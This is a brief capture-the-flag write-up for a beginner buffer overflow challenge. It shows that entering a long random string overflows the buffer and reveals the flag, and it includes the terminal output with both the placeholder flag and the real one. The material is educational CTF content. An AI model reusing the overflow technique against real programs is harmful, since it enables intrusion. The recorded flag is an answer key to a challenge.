Tags: buffer overflow pwn baby
Rating:
**Description**
Just a wee little baby pwn.
**Knowledge required :**
1) Buffer Overflow
**Solution:**
During the competition I did not look too much in detail in the program itself as my first attempt with a big random string succeeded.
1) Input a string big enough to overflow the buffer.After trying it out on the local machine - simply testing it on the challenge machine gave the flag
```
└─$ ./baby-pwn
Gimme some input: gdfgfggfdgdfgdfgdfgfgdgfdgdgfgfgfgdfgdgfdgfgfd
wctf{This_is_just_a_placeholder}
└─$ ./connect.sh
== proof-of-work: disabled ==
Gimme some input: gdfgfggfdgdfgdfgdfgfgdgfdgdgfgfgfgdfgdgfdgfgfd
wctf{W3lc0me_t0_C0stc0_I_L0v3_Y0u!}
```